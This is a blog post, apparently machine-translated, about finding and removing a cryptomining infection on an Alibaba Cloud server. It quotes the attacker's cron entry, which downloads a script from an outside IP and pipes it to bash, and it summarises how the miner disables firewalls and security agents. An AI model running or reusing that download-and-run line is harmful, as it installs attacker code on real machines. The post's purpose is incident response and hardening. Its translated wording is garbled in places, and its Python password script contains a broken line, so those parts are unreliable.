Server hacked, used for mining! How to do?

This is the 30th day of my participation in the First Challenge 2022, for more details: First Challenge 2022

Learn about cloud server development with my boss (if you are reading this series for the first time, it is highly recommended to learn the following articles) :

Pilot: Have a server, I unexpectedly so cool?

Alternative project: write a resume page in 10 lines of code!

How to apply for a free SSL certificate for a domain name

A pagoda in Linux, a real pagoda! Detailed tutorial

Finally, a website that everyone can visit

How to send alarm notifications to spikes using Python?

How to send tweets automatically in Python?

Finally, I “built” a job that could program anywhere, anytime

How to build a nail robot that can automatically reply

Use Python to make a fund query robot, can also expand!

How to install other versions of Python on Linux cloud server

Hello, everyone, I am my old cousin ~

Yesterday afternoon, a friend and I said that his server was detected by Ali Cloud mining, and then Ali cloud officials shut down the server.

Don’t worry, the easiest way at this time is to put up a work order in Aliyun and feed back relevant questions.

Unban server

To solve the problem, check and delete the mining program, we first need to unblock the server, log in the official platform of Ali Cloud, click the console -> Personal profile picture -> Security control to enter the relevant page.

In the punishment list, we can see the relevant punishment records, click to remove the ban can normally enter the server.

There will be a prompt that you need to find the mining program within three days of lifting the ban, and delete it, otherwise the official will block the server again, and can not be unblocked again (almost meaning, the server is invalid! Directly recycled by the authorities)

Troubleshoot problems

How did the “hacker” log in and take control of my server?

First of all, we can look at the vulnerability management monitoring provided by Aliyun and find that there is indeed a vulnerability, prompting: Redis is not authorized weak password.

You can use Redis to inject a local public key into the authorized_keys file of /root/.ssh/authorized_keys.

So, if you have redis installed on your server, you can consider this problem first. The main causes of this problem are:

• Redis allows remote login (public network access)
• Redis has no password or a simple password

Therefore, if it is not a business requirement, do not open redis remote login, in addition to set a more complex password, will not appear in the network, open port can also be changed, there is another point is do not use root user to start Redis, so that even if the remote connection to Redis, also can not change the root permission ~

Detailed introduction we can see this article: blog.csdn.net/fdl123456/a…

It is possible that the weak redis command caused the “hacker” to log in to our server, but I checked, my friend did not have Redis installed on his server.

Then I continue to find the problem, first need to log in the server, ask the login password found that the login password in (Ali cloud customer service) work order? A little confused hahaha…

Originally I this friend, before because of their own login password can not remote connection, so the work order to find customer service to help change the remote connection password, and customer service set up the password should be more common Aliyun2021@zSS… So far, I feel that the remote connection password was cracked/leaked, resulting in the intrusion of mining programs. (Everyone is welcome to correct)

Find the mining program

Generally speaking, if a mining program wants to run continuously, it must set some scheduled tasks. In Linux, cron is generally used to set the scheduled tasks. Users can use crontab to set the scheduled tasks.

First, run crontab -e to edit the crontab file of the root user to check whether there is a scheduled task.

crontab -e
Copy the code

(The vim editor is used by default. If you want to exit the editing mode, you can press ESC and then enter qw to exit. Enter the file editing, although the command is not easy to understand, but saw a website, an IP address, first of all very sure that the IP is not the server I log in, and look at the collation link, it should be downloaded an A.shi file, a little taste of mine ~

30 * * * * * / / bin/CDZ - fsSL http://104.192.82.138/sxxxxx5/a/a.sh | bash > / dev/null 2 > &1Copy the code

I quit, and he says I don’t have permission to change it? You can run ls -l/TMP /crontab.LQJ6aT to check who the file permission belongs to. You can also use sudo command to force modification or deletion.

We can check the basic information of this IP address, you can see that it is an American IP ~ that is almost out of ten, is a mining!!

Then we can continue to study under the front find crontab problem, first into the/TMP directory, see all content ~ crontab related documents

Delete all related files using rm -rf file name:

sudo rm -rf crontab.*
Copy the code

When I run crontab -e again, it will generate a new crontab.* file, and it will automatically mine the content.

If the crontab configuration is incorrect, enter the following command to check the configuration file.

cat /etc/crontab
Copy the code

I still can’t understand the command completely, but when I see newinit.sh, I know it’s not good.

So I took a look on my cloud server and found it was different.

As can be seen from the crontab related tutorials on the network, my own is normal ~

Do you need to modify the crontab configuration file?

Simple analysis of mining procedures

We have to see this shit mining script!! This script is in the /etc/newinit.sh configuration file. We can use nano to view the contents of this file.

nano /etc/newinit.sh
Copy the code

This script contains 125 lines of code

I am not familiar with Linux, so the following simple analysis of the script file will not be correct or wrong, please comment on it, but do not malicious attack ~) :

part one

• Setting ulimit changes the permissions of two directories, chattr, which can be used to modify file attributes on Linux file systems, which is why files were previously shown unable to be modified even under root.

• Disable iptables, UFW firewall, and NMI (Non-maskable Interruption) watchdog. Modify the permission of the file directory to add or delete only certain files in TMP and VAR folders

part two

• Here it’s easy, set some file paths, and then do some messy MV operations, equivalent to rename the file ~

part three

• Big production, uninstall Ali Cloud related security protection, Ali Cloud Ann Knight Aegis.

part four

• Mining program configuration, thiszzhIt’s an executable program, probably a mining program,newinit.shThe script for the mining program that is now being shared simply means that even if I delete the local script file, if it is not deleted here, he will download it from his own server.

part five

• I don’t understand it here. Maybe I am judging whether the program instruction is normal. If not, change file permissions? Have the understanding can supplement next ha ~

finally

• Sensation is a function{But there was no}See function means to delete the main program process,
• netstat -anpDisplay all kinds of network related information,
• grepDo an IP or port lookup, locate the row,
• awkOutput corresponding text as specified, for exampleawk '{print $7}'To print the seventh item in the text, press space/TAB.
• |Is a pipe command that passes the execution result of the command on the left as a parameter to the execution of the command on the right (xargs conversion is required).
• xargsYou can convert the left-side execution result of a pipeline command into command-line arguments and pass them to the right-side command execution

Finally, I looked at the link in the mining program configuration mentioned in Part four. I was surprised to see that there were 996 lines of code.

Modified a lot of system configuration ~ if there is something important in the server, or before matched with what very troublesome environment, to modify or quite troublesome!

Clean up mining procedures

The easiest way to do this is to reset the system directly, which I have chosen here as there is nothing to back up on my friend’s server.

As mentioned earlier, if you have a lot of important stuff and a difficult environment to configure, and you don’t want to spend the time backing up and reconfiguring the changes, you can choose to fix the changes one by one according to the mining script… Looking at 996 lines of code makes me tired!

Reset the system will be relatively simple, enter ali cloud console, and then find the corresponding instance, stop the server, and then click more -> cloud disk and mirror -> replace the operating system.

There will be a replacement reminder, and it is recommended to take a close look.

To change the operating system, you can choose the same configuration as before, or other configurations, and then click confirm order.

After the replacement is successful, the server will automatically start. We can click the administrative console and try to log in remotely.

Here are the operations and Settings that we shared earlier: How cool am I to own a server? In the following figure, we can see that crontab configuration is normal.

Finally, we can look at CPU usage after a period of time, and you can see that the CPU usage has changed from basically 100% to around 2.6% after the system is reset.

Server security precautions

First of all, the premise of prevention is not to affect our use, and even all operations should be convenient for us to use.

1, at present, I still recommend the first contact or not familiar with the cloud server reader friends to use the pagoda panel to log in, operate the server content, specific functions and use methods, we can see my previous share Linux pagoda, the real pagoda! Detailed tutorial.

2, all installed application services, try not to use the default port number, have a password to set the password, do not bother, you can use 1password.com this website to generate random password, I also shared a script ~

import string
import random
while True:
    try:
        password_len = int(input('Please enter password length (number only) :'))
        password = ' '.join(random.choices(string.printable.strip(), k=password_len))
        print(f'Your new password is: {password}, please save ~')
    except Exception as e:
        print(f{e}' {e}' {e}' {e}' {e}')
    print('type 0 if you want to end!! * * * ')
    print('*** Enter to continue generating a new password ***')
    flag = input('Continue to generate a new password:')
    if flag == '0':
        break
    print('* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *')
Copy the code

3. Do not close the firewall and security protection provided by the system

Other methods, welcome everyone to supplement ~ today here!

Persistence and hard work: results.

Click “like” to see the message forwarding, four support. Ok, see you next time, I love the cat love technology, more love si si’s old cousin Da Mian ଘ(˙꒳˙)ଓ Di Di